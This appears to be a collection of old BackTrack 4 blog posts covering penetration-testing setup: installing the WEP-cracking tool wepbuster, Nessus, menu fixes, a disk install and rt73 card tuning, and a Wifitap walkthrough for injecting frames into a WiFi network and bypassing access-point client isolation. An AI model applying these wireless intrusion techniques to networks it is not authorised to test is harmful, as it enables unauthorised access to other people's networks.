The Blog-Health-o-Meter™ reads Wow.

Crunchy numbers

The Louvre Museum has 8.5 million visitors per year. This blog was viewed about 80,000 times in 2010. If it were an exhibit at The Louvre Museum, it would take 3 days for that many people to see it.

In 2010, there was 1 new post, growing the total archive of this blog to 15 posts. There were 3 pictures uploaded, taking up a total of 357kb.

The busiest day of the year was December 5th with 355 views. The most popular post that day was WEP/WPA/WPA2 Cracking Dictionary.

Where did they come from?

The top referring sites in 2010 were wifi0wn.co.cc, google.com, en.wordpress.com, hackforums.net, and search.conduit.com.

Some visitors came searching, mostly for wpa dictionary, wpa dictionary download, dictionary wpa, wpa2 dictionary, and wpa dictionaries.

Attractions in 2010

These are the posts and pages that got the most views in 2010.

WEP/WPA/WPA2 Cracking Dictionary July 2008
12 comments

Wifi cards & Antenna July 2008
4 comments

Airsnarf-The Rogue Access-Point(BackTrack 3 As Fake AP) July 2008
3 comments

Back|Track 4 beta & Windows 7 Ultimate Dual Boot February 2009

Wireless Tools & Software July 2008
3 comments

thanks to markjayson.alvarez for making such wonderful tool.

REQUIREMENTS:

                                                                         
  - aircrack-ng 1.0                      
                                                                                 
  - perl installation with standard libraries (threading support)                
     - perl modules (http://search.cpan.org)                                    
        - Term::ReadKey                                                  
        - Expect.pm
        - Getopt::Long
        - File::Slurp
        - Number::Range
        - Algorithm::Permute
        - Pod::Usage
                                                                                                                                                 
  - macchanger   (www.alobbs.com/macchanger)                                    
                                                                                 
  - miscellaneous unix programs                                          
        - ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,      
         dhclient, netstat

download the source code from wepbuster project site here.

Wepbuster Download

or

wget http://wepbuster.googlecode.com/files/wepbuster-1.0_beta-0.7.tgz

Download dependencies

wget http://search.cpan.org/CPAN/authors/id/J/JS/JSTOWE/TermReadKey-2.30.tar.gz
wget http://search.cpan.org/CPAN/authors/id/R/RG/RGIERSIG/Expect-1.21.tar.gz
wget http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
wget http://search.cpan.org/CPAN/authors/id/D/DR/DROLSKY/File-Slurp-9999.13.tar.gz
wget http://search.cpan.org/CPAN/authors/id/L/LA/LARRYSH/Number-Range-0.07.tar.gz
wget http://search.cpan.org/CPAN/authors/id/E/ED/EDPRATOMO/Algorithm-Permute-0.12.tar.gz
wget http://search.cpan.org/CPAN/authors/id/M/MA/MAREKR/Pod-Parser-1.38.tar.gz

tar -zxvf Algorithm-Permute-0.12.tar.gz
cd Algorithm-Permute-0.12
perl Makefile.PL
make
make install

tar -zxvf Expect-1.21.tar.gz
cd Expect-1.21
perl Makefile.PL
make
make install

tar -zxvf File-Slurp-9999.13.tar.gz
cd File-Slurp-9999.13
perl Makefile.PL
make
make install

tar -zxvf Getopt-Long-2.38.tar.gz
cd Getopt-Long-2.38
perl Makefile.PL
make
make install

tar -zxvf Number-Range-0.07.tar.gz
cd Number-Range-0.07
perl Makefile.PL
make
make install

tar -zxvf Pod-Parser-1.38.tar.gz
cd Pod-Parser-1.38
perl Makefile.PL
make
make install

tar -zxvf TermReadKey-2.30.tar.gz
cd TermReadKey-2.30
perl Makefile.PL
make
make install

now you are ready to install wepbuster as all dependencies are satisfied now
tar -zxvf wepbuster-1.0_beta-0.7.tgz
cd wepbuster-1.0_beta

cp wepbuster /usr/bin
.wepbuster

by default it scans according to US standard e.g. channel 1 6 11.to change this default behavior & to force scanning on channels.edit

kwrite wepbuster

find section

my $country = ‘US’; & replace with my $country = ‘all’;

save & exit & rerun wepbuster

Normal usage commands:

  perl wepbuster [channel(s)]
  perl wepbuster [sort | connect] [hostname/ip address]
  perl wepbuster permute [OPTIONS]
  or
  perl wepbuster --help | --man for list of all supported options.

Main project page

marketing

This menufix took a lot of time to prepare and to check.there are 2 things in this tutorial.one for spoon kiddies & another who wants to know,what actual is going on.I mean step by step fixing.for automatic fixing the menu.download the package & copy the applications-kmenuedit.menu from package & overwrite to ~/.config/menus/applications-kmenuedit.menu & copy applications folder & overwrite to ~/.local/share/applications/

I have installed the following packages too and fixed menu according to them as I was missing some of interesting stuff from BT3.these things are optional to install & may vary on your wish.

apt-get install kppp
snort(Don’t use apt-get as it will install old version.2.7)
Nessus 3.2.1
apt-get install bluez(Those missing bluetooth)

from terminal type kmenuedit

expand BackTrack menu

Vulnerability Identification
All
smbclient.py
(For fixing this copy the smbclient.py to /usr/bin

expand BackTrack menu

VOIP
All
Erase_registrations
Command:./erase_registrations;sudo -s

expand BackTrack menu
apt-get install apt-get install gcc-4.2
Press Y
Download MDK3
wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/mdk3-v5.tar.bz2
extract the mdk3-v5.tar.bz2
cd mdk3-v5/osdep
kwrite common.mak
find the lines
CC = $(TOOL_PREFIX)gcc & change to CC = $(TOOL_PREFIX)gcc-4.2
save & exit
cd ..
make && make install

Radio Network Analysis
80211
All
ctrl+n
type MDK3
command:/usr/local/sbin/mdk3;sudo -s
select Run in terminal

Radio Network Analysis
80211
Cracking
ctrl+n
type MDK3
command:/usr/local/sbin/mdk3;sudo -s
select Run in terminal

expand BackTrack menu

Privilege Escalation
All
ctrl+n
type Etherape
command:etherape;sudo -s

expand BackTrack menu

Privilege Escalation
Sniffers
ctrl+n
type Etherape
command:etherape;sudo -s

expand BackTrack menu

Miscellaneous
usbview
Error:cannot open the file /proc/bus/usb/devices
FIX:add these lines to /etc/fstab
none /proc/bus/usb usbfs defaults
save & exit

expand BackTrack menu

Install flash player for firefox

wget http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player_10_linux.deb
dpkg -i install_flash_player_10_linux.deb
Cut & paste the /pentest/web/swfintruder to /var/www/swfintruder
copy & paste the /var/www/swfintruder/testSwf/test.swf to /var/www/swfintruder/
Miscellaneous
swfintruder
command:firefox http://127.0.0.1/swfintruder

launch the tool and in flash movie:type http://127.0.0.1/swfintruder/test.swf & hit load
now further you can put the swf files in /var/www/swfintruder & can test

expand BackTrack menu

Miscellaneous
ctrl+n
RFIDIOt
command:ls;sudo -s
Work path:/pentest/rfid/RFIDIOt-0.1w
checkmark Run in terminal

expand documents->All

Ctrl+n
type wiki.remote-exploit.org (wait untill new bt4 wiki launches)
command:konqueror http://wiki.remote-exploit.org

Ctrl+n
type www.isecom.org
command:konqueror http://www.isecom.org/osstmm

ctrl+n
type www.oissg.org
command:konqueror http://www.oissg.org/content/view/71/71

expand documents->BackTrack

ctrl+n
type www.remote-exploit.org
command:konqueror http://www.remote-exploit.org

ctrl+n
type forums.remote-exploit.org
command:konqueror http://forums.remote-exploit.org

expand docuements->OSSTMM

Ctrl+n
type www.isecom.org
command:konqueror http://www.isecom.org/osstmm

expand documents->ISSAF

type www.oissg.org
command:konqueror http://www.oissg.org/content/view/71/71

expand Editors

ctrl+n
type kwrite
command:kwrite %U

ctrl+n
type kate
command:kate %U

ctrl+n
type nedit
command:nedit %U

expand Internet

ctrl+n
type Network Manager
command:/etc/init.d/NetworkManager;sudo -s

ctrl+n
type vncviewer
command:vncviewer

expand Services

Right click services & choose new submenu
type Nessus

ctrl+n
type Start Nessus
command:/etc/init.d/nessusd start;sudo -s

ctrl+n
type Stop Nessus
command:/etc/init.d/nessud stop;sudo -s

For using BeEF service download beef:
wget http://www.bindshell.net/tools/beef/beef-v0.3.2.tar.gz
extract to /var/www/
copy the supplied setup-beef.sh to /usr/bin folder
test using http://127.0.0.1/beef(run apache2 first)

select BEEF
ctrl+n
Setup BeEF
command:setup-beef.sh;sudo -s
checkmark Run in terminal

select HTTPD
ctrl+n
type Start HTTPD
command:service apache2 start;sudo -s

ctrl+n
type Stop HTTPD
command:service apache2 stop;sudo -s

ctrl+n
type Restart HTTPD
command:/etc/init.d/apache2 restart;sudo -s

For using service mysql do this
delete the folder mysql in /var/lib(e.g.the /var/lib/mysql folder)
then run
dpkg-reconfigure mysql-server-5.0
Enter the password you want to use for root user.

select Mysql
ctrl+n
type Start Mysql
command:service mysql start;sudo -s

ctrl+n
type Stop Mysql
command:service mysql stop;sudo -s

ctrl+n
type Restart mysql
command:service mysql restart;sudo -s

select snort
ctrl+n
type Snort
command:snort;sudo -s

for using SSH Services first use
sshd-generate

select SSH
ctrl+n
Start SSHD
command:/bin/bash /etc/init.d/ssh start;sudo -s

ctrl+n
Stop SSHD
command:/bin/bash /etc/init.d/ssh stop;sudo -s

for using TFTP Services
mkdir /var/lib/tftpboot
chmod 777 /var/lib/tftpboot

select TFTPD
ctrl+n
Start TFTPD
command:/usr/sbin/inetd;sudo -s

ctrl+n
Stop TFTPD
command:killall -e /usr/sbin/inetd;sudo -s

select VNC
ctrl+n
Start VNC Server
command:vncserver;sudo -s

Stop VNC Server
command:vncserver -kill :1;sudo -s

expand graphics

ctrl+n
type kghostview
command:kghostview %u -caption “%c” %i %m

expand Utilities

ctrl+n
type oclock
command:oclock;sudo -s

expand utilities->desktop

ctrl+n
type kpager
command:kpager;sudo -s

ctrl+n
type Clipboard Tool
command:klipper;sudo -s

right click Utilities & choose new submenu

type peripherals
ctrl+n
type FAX Utility
command:kdeprintfax;sudo -s

expand X-Utilities

ctrl+n
type X Calc
command:xcalc;sudo -s

ctrl+n
type X Clock
command:xclock;sudo -s

ctrl+n
type X Clipboard
command:xclipboard;sudo -s

ctrl+n
type X Console
command:xconsole;sudo -s

ctrl+n
type X Editor
command:xedit %f;sudo -s

ctrl+n
type X Kill
command:xkill;sudo -s

ctrl+n
type X Load
command:xload;sudo -s

ctrl+n
type X Magnifier
command:xmag

click on File menu->new Item

type Find File/Folders
command:kfind;sudo -s

click on File menu->new submenu

type Toys
ctrl+n
type X Eyes
command:xeyes;sudo -s

ctrl+s & exit

Those who want Ettercap GUI perform this

apt-get install ettercap-gtk
press Y(Yes I know it will try to remove fasttrack as fasttrack is depend on ettercap)
cd /pentest/exploits
svn co http://svn.thepentest.com/fasttrack/
cd fasttrack
python setup.py install (Now answer some of the Q accordingly & you have done)
./fasttrack -g & ettercap -G both working correctly.

I have not used any other tools except the one’s which are included by default in BT 4 Beta.extra tools have been mentioned above only.if still something left then please let me know.thanks for reading this.below is some files which you need to download.Please CLICK here.

updating apt-get update I was getting following error

: GPG error: http://ppa.launchpad.net intrepid Release: The following signatures couldn’t be verified because the public key is not available: NO_PUBKEY CB2F6C86F77B1CA9

Solution:
Add the GPG signing key:
wget http://apt.pearsoncomputing.net/public.gpg
sudo apt-key add public.gpg

now run apt-get update

“cannot lock media/.hal-mtab” .while try to access the device

Make appropriate directory e.g. /mnt/sda1 & then put automount entry in /etc/fstab
mkdir /media
touch /media/.hal-mtab

edb: error while loading shared libraries: libQtGui.so.4: cannot open shared object file: No such file or directory

Evan’s debugger uses qt libraries and thus missing dependencies.here is how to do
download getlibs
wget http://www.boundlesssupremacy.com/Cappy/getlibs/getlibs-all.deb
dpkg -i getlibs-all.deb
getlibs libQtGui.so.4 (it will check for dependencies & packages needed)
Press Y
now run edb

MYSQL Error in db_create Metasploit

msf > load db_mysql[*] Successfully loaded plugin: db_mysql

msf > db_create

mysqladmin: connect to server at ‘localhost’ failed
error: ‘Access denied for user ‘root’@'localhost’ (using password: NO)’
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: NO)[*] Database creation complete (check for errors)

msf > db_import_nmap_xml xpsp2.xml
[-] Error while running command db_import_nmap_xml: Access denied for user ‘root’@'localhost’ (using password: NO)
Kindly check the Entry above for fixing Mysql-server 5.0 & just don’t assign any password while dpkg-reconfigure

Inguma GUI FIX

python ingumagui.py
Traceback (most recent call last):
File “ingumagui.py”, line 28, in <module>
from qt import *
ImportError: No module named qt
apt-get install python-qt3

SSHatter Parallel-ForkManager & Net-SSH-Perl Dependency FIX

those who installed SSHatter
root@ThUNdErbOlt:/pentest/password/SSHatter-0.6/src# ./SSHatter.pl
Can’t locate Parallel/ForkManager.pm in @INC (@INC contains: /etc/perl /usr/local/ lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/ lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at ./SSHatter.pl li ne 33.
BEGIN failed–compilation aborted at ./SSHatter.pl line 33.
FIX
wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz
tar -zxvf Parallel-ForkManager-0.7.5.tar.gz
cd Parallel-ForkManager-0.7.5
perl Makefile.PL
make
make install
cd \
wget http://search.cpan.org/CPAN/authors/id/T/TU/TURNSTEP/Net-SSH-Perl-1.34.tar.gz
tar -zxvf Net-SSH-Perl-1.34.tar.gz
cd Net-SSH-Perl-1.34
perl Makefile.PL
make
make install

1.Aircrack-ng
2.Metasploit Framework
3.Milw0rm Database
4.Nmap
5.Fast-Track
6.Nikto
7.Inguma
8.W3af
9.Nessus-Plugins(register yourself for getting home-feed first & using for using this you need to have nessus already installed in system)

10.Snort rules(Only version 2.8 support yet & downloading can be done with the interval of 15 mins after previous download)

11.All(All-In-One Tools Silent Updation)

The attach file is debian package.

DOWNLOAD HERE

Install it using

bt~#dpkg -i bt4_tool_updater1.0.deb

remove using

bt~#dpkg -r bt4-tu

Nessus-3.2.1-ubuntu804_i386.deb

NessusClient-3.2.1-debian4_i386.deb

(I choose this debian package because NessusClient-3.2.1.1-ubuntu804.i386.deb was missing some of dependencies and was not installing correctly.instead the debian package worked like a charm and it produces no error at all.

Next register your copy to get plugins update using homefeed and please provide the real mail ID as they will send you the activation key for homefeed.

Regsiter Here

Click accept and enter a valid working email ID.

now we start installing the packages.

root@ThUndErbOLt:~#dpkg -i Nessus-3.2.1-ubuntu804_i386.deb

now configure the certificate & admin user for nessus

root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-mkcert  (this is neccessary to communicate between nessus client to nessus daemon/remote host)

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:IN
Your state or province name [none]: Karnataka
Your location (e.g. town) [Paris]: Bangalore

it should show the message

Congratulations. Your server certificate was properly created.

hit enter to come out

root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-adduser

enter information about the user.

Login

Authentication (Pass/Cert)

Password:

confirm password:

after configuring the parameters it ask for rule-set.we have configured the admin user having full permissions.if we wants to limit and want to add certain users then we can use rule-set here.

For configuring ruleset please refer to nessus-adduser( 8 ) man page for the rules syntax as it limit the use of nessus.

press ctrl + d

it asks for confirmation.choose y

now start Nessus daemon by using

root@ThUndErbOLt:~# /etc/init.d/nessusd start

$Starting Nessus : .

confirm that its running using

root@ThUndErbOLt:~# netstat -ant|grep 1241
tcp                      0                        0 0.0.0.0:1241            0.0.0.0:*               LISTEN
tcp6                   0                        0 :::1241                          :::*                            LISTEN

now Install NessusClient(the GUI Frontend to use nessusd)

root@ThUndErbOLt:~# dpkg -i NessusClient-3.2.1-debian4_i386.deb

now register the plugin feed for updating nessus

root@ThUndErbOLt:~#/opt/nessus/bin/nessus-fetch –register XXXX-XXXX-XXXX-XXXX(replace X with your keys)

Your activation code has been registered properly – thank you.
Now fetching the newest plugin set from plugins.nessus.org…
now it will download the plugins and will purge them into database.if you don’t wan’t to do this now.press ctrl + c to cancel it.later you can download it using

root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-update-plugins

run the scan using NessusClient

backtrack menu->Internet->NessusClient

click on + icon

by default selection radiobox is single host

type Host Name localhost & hit save

select the localhost & press connect

from connect option box choose edit

set the Login & Password which we created earlier using nessus-adduser

hit Save

select localhost & hit connect

first time it asks for logging into nessus server.hit yes

now you can customize the default scan/microsoft scan policy and can scan.that’s it!

please refer to this page for Nvidia chipset & to know which driver is for your chipset

http://www.nvidia.com/Download/index.aspx?lang=en-us

In my case of Nvidia 9 Series Mobile chipset I am using

wget http://us.download.nvidia.com/XFree86/Linux-x86/180.22/NVIDIA-Linux-x86-180.22-pkg1.run

for installing it,its neccessary that you logout from KDE X

root@ThUnDeRbOLt:~#install NVIDIA-Linux-x86-180.22-pkg1.run nvidia
root@ThUnDeRbOLt:~#./nvidia

it will autoconfigure options according to kernel.if all went well you will see success message else note the error messages as it may be because of installing wrong drivers for chipset or mismatch in kernel version.

next
root@ThUnDeRbOLt:~#apt-get install compiz compiz-fusion-plugins-extra compiz-fusion-plugins-unsupported emerald simple-ccsm fusion-icon

For Emerald windows decorator download:
root@ThUnDeRbOLt:~#wget http://fr.archive.ubuntu.com/ubuntu/pool/universe/e/emerald/libemeraldengine0_0.7.2-0ubuntu2_i386.deb
root@ThUnDeRbOLt:~#wget http://fr.archive.ubuntu.com/ubuntu/pool/universe/e/emerald/emerald_0.7.2-0ubuntu2_i386.deb
root@ThUnDeRbOLt:~#dpkg -i libemeraldengine0_0.7.2-0ubuntu2_i386.deb
root@ThUnDeRbOLt:~#dpkg -i emerald_0.7.2-0ubuntu2_i386.deb

Upgrade the Emerald themes using
root@ThUnDeRbOLt:~#svn ls https://svn.generation.no/emerald-themes
This will download and install the security key needed later to install these themes. When it asks, accept the certificate permanently.

More themes can be found here.Download and import in emerald theme manager

Invoke the compiz-fusion icon through backtrack menu->system->compiz fusion

right click on compiz fusion icon and choose reload window manager

some of effects you would like to play with
Cube
For cube its neccessary to have minimum 4 desktop.so first we set it
go to backtrack menu->system->settings->desktop->multiple desktops
set here 4 desktop at least

now right click on the compiz fusion icon and choose setting manager
choose genral options
select desktop size tab
move slider Horizontal Virtual Size to 4(Number of desktop you want to see)
press back to go back

now from effect choose desktop cube & Rotate cube
configure zoom setting in rotate cube->genral tab set zoom to 0.1827(play with this setting)

now when you can use this effect by holding ctrl+alt  & left mouse button or by simply pressing middle mouse button in the center of desktop.

Wobbly windows
click on this and enable it and goto genral tab & set friction to 2.1926(play with this setting)

enable 3D Windows
enable Animations

If you want cube reflection & deformation then select it as it will present cube in deform one.

cube atlantis will fill fishes etc in the depth of cube.the topmost part.see them playing.
goto cube atlantis water/ground tab & clear the checkbox render water wireframe

Transparency
goto desktop cube->transparent cube tab and adjust the “opacity during rotation” slider to 85.0000(set according to your wish)

select skydome & cube caps(upper cube caps)for desktop
goto desktop cube->appearance tab select image file
goto desktop cube->appearance tab checkbox select skydome option & choose image

now you have seen a lot of tweaks.have a beautiful desktop ahead.

Water effect on backtrack 4 beta

Fire effect on Back|Track 4 Beta

Some Color Firy effect on BT4

Blur effect on BT4 Beta

Cube Relection & deformation effect in BackTrack 4 Beta

Rotating 3D Cube in Back|Track 4 Beta

3D Cube with Transparent cube atlantis(fishes inside cube)

Expo Effect of multiple desktops in BT 4

cube effect after setting cube caps & skydome

For Enabling emerald theme manager
Right click on fusion icon
select window decorator as emerald
select window manager as compiz
choose the themes from Emerald Theme Manager
you should have pretty desktop now in front of you.

Emerald Theme on B|T 4

6 desktop in rotating cube with Emerald theme

Boot through BT4 ISO and see the mount point using

root@ThUnDerBolT:~#nano /etc/fstab

here is how my partition scheme looks like

Note down the partition scheme of your HDD as it will be use for later reference

now back to terminal

unmount all the NTFS & EXT,reiserfs File System

root@ThUnDerBolT:~#umount /dev/sda1

root@ThUnDerBolT:~#umount /dev/sda2

root@ThUnDerBolT:~#umount /dev/sda3

root@ThUnDerBolT:~#umount /dev/sda5

root@ThUnDerBolT:~#umount /dev/sda6

now fdisk the sda harddisk

root@ThUnDerBolT:~#fdisk /dev/sda

Here is how my hard-disk partition scheme is

Please note down the linux partions start cylinder & last cylinder.In my case its

/dev/sda5     29561     30325     83    Linux

/dev/sda6     30326    30334     83     Linux

/dev/sda7     30335    30401     82     Linux swap / Solaris

now delete the Linux partitions carefully.use commands

d

7

d

6

d

5

w

now reboot once as the kernel is still using old tables

root@ThUnDerBolT:~#init 6

now back to terminal after reboot

root@ThUnDerBolT:~#fdisk /dev/sda

n

29561

30325

n

30326

30334

n

30335

30401

t

2  #only if you are seeing your NTFS partition as Hidden HPFS/NTFS

7  #change Hidden HPFS/NTFS to Normal HPFS/NTFS partition

t

3 #only if you are seeing your NTFS partition as Hidden HPFS/NTFS

7 #change Hidden HPFS/NTFS to Normal HPFS/NTFS partition

t

7

82 #setting last sda7 as swap partition

p

and it should look like this now

now write the tables

w

root@ThUnDerBolT:~#mke2fs /dev/sda6

root@ThUnDerBolT:~#mkswap /dev/sda7

root@ThUnDerBolT:~#swapon /dev/sda7

root@ThUnDerBolT:~#mkreiserfs /dev/sda5

Choose Y

root@ThUnDerBolT:~#mkdir /mnt/backtrack

root@ThUnDerBolT:~#mount /dev/sda5 /mnt/backtrack

root@ThUnDerBolT:~#mkdir /mnt/backtrack/boot

root@ThUnDerBolT:~#mount /dev/sda6 /mnt/backtrack/boot

root@ThUnDerBolT:~#cp –preserve -R /{bin,dev,home,pentest,root,boot,usr,etc,lib,opt,sbin,var} /mnt/backtrack

root@ThUnDerBolT:~#cd /mnt/backtrack

root@ThUnDerBolT:~#mkdir {mnt,proc,sys,tmp}

root@ThUnDerBolT:~#chmod 1777 /mnt/backtrack/tmp

root@ThUnDerBolT:~#mount –bind /dev /mnt/backtrack/dev

root@ThUnDerBolT:~#mount -t proc proc /mnt/backtrack/proc/

root@ThUnDerBolT:~#chroot /mnt/backtrack /bin/bash

root@ThUnDerBolT:~#nano /etc/lilo.conf

your LILO config should look like this

Replace the windows partition with yours e.g. /dev/sda1 to blah blah

save and exit

root@ThUnDerBolT:~#lilo -v

reboot

Make mount points for our windows/pen drive

root@ThUnDerBolT:~#mkdir /mnt {sda1,sda2,sda3,sdb1,sr0)

root@ThUnDerBolT:~#nano /etc/fstab

Update your fstab file & add entries of partitions there

here is how my fstab looks like.update it accordingly to your HDD partitions

Save & Exit

root@ThUnDerBolT:~#init 6

That’s it!

————————————————-

BUGS/Mods:

1.if you are getting error “cannot obtain lock on /media/.hal-mtab” then enter the mount partion entry into /etc/fstab file.e.g as I was getting this error while accessing DVD Drive and Pen-Drive or windows partitions then make directories and update fstab file

2.if you have used command “update-rc.d networking defaults”.every time BT starts it will look for DHCP address for NIC’s.if you don’t have any connection at that time.it will just keep looking.for getting it out press ctrl +c and enter.it will carry on booting then.

3.those who wants to manually start networking type

root@ThUnDerBolT:~#/etc/init.d/networking start

If any bugs feel free to comment it and to update on remote-exploit forum.

Tested on hardware Linksys WUSB54GC rt73 chipset based.

there is new update for rt73 chipset based cards.first download the latest modules.

working with wpa_supplicant.
you need to patch wpa_supplicant
or
use the next generation rt2x00 driver which is compatible with wpa_supplicant
or
latest modules of rt73 have in-built private ioctls to support wpa_supplicant like config.

Ok we begin
http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
extract archive

ifconfig rausb0 down
modprobe -r rt73
cd rt73-k2wrlz-3.0.1/module
make && make install

modprobe rt73 ifname=rausb0 or wlan0
(here you can choose the appropriate name according to your choice like wlan0 or rausb0 or eth1 whatever)

now use the iwpriv command to avaliable private ioctls
iwpriv wlan0

bt ~ # iwpriv wlan0
wlan0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
txpower (8BF3) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BEF) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BF1) : set 1024 char & get 0
forceprism (8BF2) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 0
get_rfmontx (8BED) : set 0 & get 1 int
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0

you are able to see that we got options like txpower and wpapsk,auth,enc etc to modify the settings.

if you want to set the txpower output.use
ifconfig wlan0 down
modprobe -r rt73
modprobe rt73 txPowerTuning=36 ifname=wlan0
Remember: This value will be ADDED to the default Power stored in the card’s EEPROM!
Remember: This value will be ADDED to the default Power stored in the card’s EEPROM!
Valid Values for Transmit Power: -6 to 36 (0xFA to 0×24).
WARNING: MAY DAMAGE YOUR HARDWARE! – USE AT OWN RISK!
I set it on my Linksys WUSB54GC as 36 without problem.
now you can use
iwconfig

it will show the USB NIC interface as newly created wlan0

use airodump-ng wlan0

you will get pwr much more then before.I got amazingly 90 to 110.

now you have options to use and work with WPA/WPA2 networks.
first option as already told use latest rt2x00 drivers from serialmonkey or configure the wlan0 USB NIC as following

b) WPA (802.11g)

wpa_passphrase <essid> <passphrase>
copy the psk hash(uncommented one)
iwconfig wlan0 mode managed
iwpriv wlan0 set AuthMode=WPAPSK
iwpriv wlan0 set WPAPSK=<key> #replace key with your psk-hash
iwpriv wlan0 set EncrypType=TKIP

c) WPA2 (802.11i)
wpa_passphrase <essid> <passphrase>
copy the psk hash(uncommented one)
iwpriv wlan0 set AuthMode=WPA2PSK
iwpriv wlan0 set WPAPSK=<KEY> #replace key with your psk-hash
iwpriv wlan0 set EncrypType=AES

Check that you’re associated with an AP
iwconfig wlan0

or
if you want to patch wpa_supplicant for rt73 chipset you need to patch
the wpa_supplicant file to work with rt73 based chipset
download wpa_Supplicant & patch files here.

WPA_Supplicant-0.5.10.tar.gz
wpa_supplicant-ralink_rt73.patch
wpa_supplicant-ralink_rt73-fix.patch

tar xzf wpa_supplicant-0.5.7.tar.gz
cd wpa_supplicant-0.5.7
patch -p1 < wpa_supplicant-ralink_rt73.patch
patch -p1 < wpa_supplicant-ralink_rt73-fix.patch
make
# install as usual, e.g.
cp wpa_cli wpa_supplicant /usr/local/bin

configure using wpa_supplicant(other users who looking for wpa_supplicant config. can try this)

use these commands

wpa_passphrase <essid> <passphrase>
e.g.
bt ~ # wpa_passphrase thunderbolt backtrack3
network={
ssid=”thunderbolt”
#psk=”backtrack3″
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149 bd2f42e42e631bedb0
}
copy the psk-hash

for configuring wpa_supplicant
nano /etc/wpa_supplicant.conf

edit it
# WPA protected network, supply your own ESSID and WPAPSK here:
network={
scan_ssid=0 #1 is ssid is hidden
ssid=”thunderbolt” #change with your ssid/essid
proto=WPA
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149 bd2f42e42e631bedb0
# change the psk hash with your psk hash you got from wpa_passphrase
}

now connect with WPA/WPA2 enable AP using

bt ~ # wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf – d rt73 -w (other user may change to ath0,wifi0)

Trying to associate with 00:21:29:68:16:c2 (SSID=’thunderbolt’ freq=2462 MHz)

Associated with 00:21:29:68:16:c2
WPA: Key negotiation completed with 00:21:29:68:16:c2 [PTK=TKIP GTK=TKIP]
CTRL-EVENT-CONNECTED – Connection to 00:21:29:68:16:c2 completed (auth) [id=0 id_str=]

Here you done configuring txpower for new rt73 module,configuring wpa/wpa2.hope you all liked this little hardware hacks and configs.

Wifitap allows direct communication with an associated station to a given access point directly, meaning:

* not being associated ourselves;
* not being handled by access point.

airmon-ng start ath0
airmon-ng start wifi0
airmon-ng start wifi0
(Now you have 3 ath interface.ath0,ath1,ath2)

airodump-ng ath1
Note the BSSID of your AP.
Wifitap is ready to be launched to communicate with reachable associated stations to access point

goto /pentest/wireless/wifitap

modprobe tun (we need this tunnel interface to inject frames)

bt wifitap# wifitap.py -b 00:21:29:68:16:C2 -o ath2 -i ath2
(Launching Wifitap creates an tuntap interface named wj0 through which we can inject regular IP traffic)

assign an IP address to the wjo interface
bt~#ifconfig wj0 192.168.1.200 (Most of the routers work in 192.168.1.X segment so you can use safely any IP except 192.168.1.1,192.168.1.10,192.168.1.100 etc.)

Now we can reach 192.168.1.0/24 through wj0. now start listening on ath2 interface we can discover associated stations and communicate with them with IP.

bt~#tcpdump -vvv -i ath2

NB : wj0 MAC address is used as source for sent frames if you don’t provide source MAC address using -s <SMAC>

bt ~ # route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags  Metric Ref     Use    Iface
192.168.1.0     0.0.0.0         255.255.255.0   U      0         0           0      eth0
192.168.1.0     0.0.0.0         255.255.255.0   U      0         0           0      wj0
127.0.0.0        0.0.0.0         255.0.0.0          U      0         0           0       lo
0.0.0.0         192.168.1.1     0.0.0.0             UG     0        0           0       eth0

bt ~ # ping 192.168.1.100
PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.
64 bytes from 192.168.1.100: icmp_seq=1 ttl=64 time=0.045 ms
64 bytes from 192.168.1.100: icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from 192.168.1.100: icmp_seq=3 ttl=64 time=0.035 ms
64 bytes from 192.168.1.100: icmp_seq=4 ttl=64 time=0.040 ms

— 192.168.1.100 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.035/0.039/0.045/0.004 ms

you have successfully setup a connection with router.Wifitap allows any application do send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply configuring wj0, which means :

* setting an IP address consistent with target network address range ;
* routing desired traffic through it.

In particular, it’s a cheap method for arbitrary packets injection in 802.11 frames without specific library.

In addition, it will allow one to get rid of any limitation set at access point level, such as bypassing inter-client communications prevention systems (e.g. Cisco PSPF) or reaching multiple SSID handled by the same access point.
Wifitap can easily be modified to be used as a framework for simple tasks such as injecting answers to captured frames.

If you want to use Scapy for captured packets parsing and answers generation, it is necessary to add import for related classes. For instance, if you want to work on ICMP packets, just add:

from scapy  import IP,ICMP

Then, you have to rip tuntap interface handling:

* initialisation;
* reading;
* writting.

Finally, you have to modify the main loop to handle interesting frames identification, fields parsing, then answers generation and injection.

Wifitap contains sample programs:

* ARP requests answering machine (wifiarp.py);
* DNS requests answering machine (wifidns.py).
* ICMP Echo Requests answering machine (wifiping.py);

Prerequisites

* A card working with the MadWifi drivers. There are some specific commands (wlanconfig) that will need to be changed if you are going to hack this for other cards/drivers.
* A card that supports Master or AP mode. This allows it to function or appear as an access point to wireless clients.
